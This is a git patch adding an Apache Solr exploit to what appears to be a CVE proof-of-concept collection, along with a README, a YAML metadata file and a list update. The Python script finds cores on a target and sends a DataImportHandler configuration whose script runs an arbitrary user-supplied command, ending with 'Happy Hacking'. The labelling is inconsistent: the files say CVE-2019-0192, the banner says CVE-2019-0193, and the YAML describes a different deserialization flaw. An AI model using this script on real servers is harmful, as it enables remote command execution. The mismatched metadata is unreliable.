From 616a48e6f509061b37614f0ea52b510a2f1acfbf Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Mon, 27 Mar 2023 13:08:35 +0000 Subject: [PATCH 1/2] CVE-2019-0192 Signed-off-by: MaJiahao --- .../2019/CVE-2019-0192/CVE-2019-0192.py | 57 +++++++++++++++++++ cve/apache-solr/2019/CVE-2019-0192/README.md | 10 ++++ cve/apache-solr/2019/yaml/CVE-2019-0192.yaml | 20 +++++++ 3 files changed, 87 insertions(+) create mode 100644 cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py create mode 100644 cve/apache-solr/2019/CVE-2019-0192/README.md create mode 100644 cve/apache-solr/2019/yaml/CVE-2019-0192.yaml diff --git a/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py new file mode 100644 index 00000000..7a8f6cbb --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py @@ -0,0 +1,57 @@ +import requests +import json +import sys + + +banner = ''' + ____ _ ____ ____ _____ +/ ___| ___ | |_ __| _ \ / ___| ____| +\___ \ / _ \| | '__| |_) | | | _| + ___) | (_) | | | | _ <| |___| |___ +|____/ \___/|_|_| |_| \_ \____|_____| + +CVE-2019-0193 (Rapid SafeGuard) +''' +print (banner) + +def findcores(url, cmd): + core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' + r = requests.get(url=core_selector_url) + json_strs = json.loads(r.text) + if r.status_code ==200 and "responseHeader" in r.text: + print ("\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))) + for core_selector in json_strs['status']: + coreselector = json_strs['status']['%s'%core_selector]['name'] + print ('\n>>>>The Core Name = %s' % coreselector) + proofofconcept(url,coreselector,cmd) + + else: + print "No core_selector Exit!" + + +def proofofconcept(url,coreselector,cmd): + debug_model_url = url + '/solr/'+ coreselector +'/dataimport?_=1565530241159&indent=on&wt=json' + payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + "Content-type":"application/x-www-form-urlencoded", + "X-Requested-With":"XMLHttpRequest", + "Referer":"http://%s/solr/" % url + + } + r3 = requests.post(url = debug_model_url, data=payload,headers=headers) + print ">>>>> debug_model_url= %s" % debug_model_url + if r3.status_code ==200 and 'Requests' in r3.text: + print ("Exploit Done! Happy Hacking") + else: + print ("No Send Poc Success!") + + + +if __name__ == '__main__': + url = raw_input("Enter IP and Port with http") + cmd = raw_input("Enter command") + findcores(url,cmd) diff --git a/cve/apache-solr/2019/CVE-2019-0192/README.md b/cve/apache-solr/2019/CVE-2019-0192/README.md new file mode 100644 index 00000000..5ccf46b6 --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/README.md @@ -0,0 +1,10 @@ +# Solr-RCE-CVE-2019-0192 +Apache Solr remote code execution via dataImportHandler + +### Target Solr version: 1.3 – 8.2 +Requirements: DataImportHandler should be enabled, which is not by default. I have tested on version 6.2 + +### python +python solr_RCE.py + + diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml new file mode 100644 index 00000000..b071b64e --- /dev/null +++ b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml @@ -0,0 +1,20 @@ +id: CVE-2019-0192 +source: https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192 +info: + name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 + severity: critical + description: + CVE-2019-0192漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发Solr端上的远程代码执行。 + scope-of-influence: + Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5 + reference: + - https://github.com/mpgn/CVE-2019-0192 + - https://nvd.nist.gov/vuln/detail/CVE-2019-0192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0192 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2021, Apache, Solr, RCE -- Gitee From b74a789850c4652edb0a7ebeaa257b5d7e0925e0 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Mon, 27 Mar 2023 13:09:58 +0000 Subject: [PATCH 2/2] update openkylin_list.yaml. Signed-off-by: MaJiahao --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 34ec4afd..ca0c0e0e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -17,6 +17,7 @@ cve: - CVE-2021-44228 apache-solr: - CVE-2021-27905 + - CVE-2019-0192 apache-tomcat: - CVE-2022-29885 - CVE-2020-9484 -- Gitee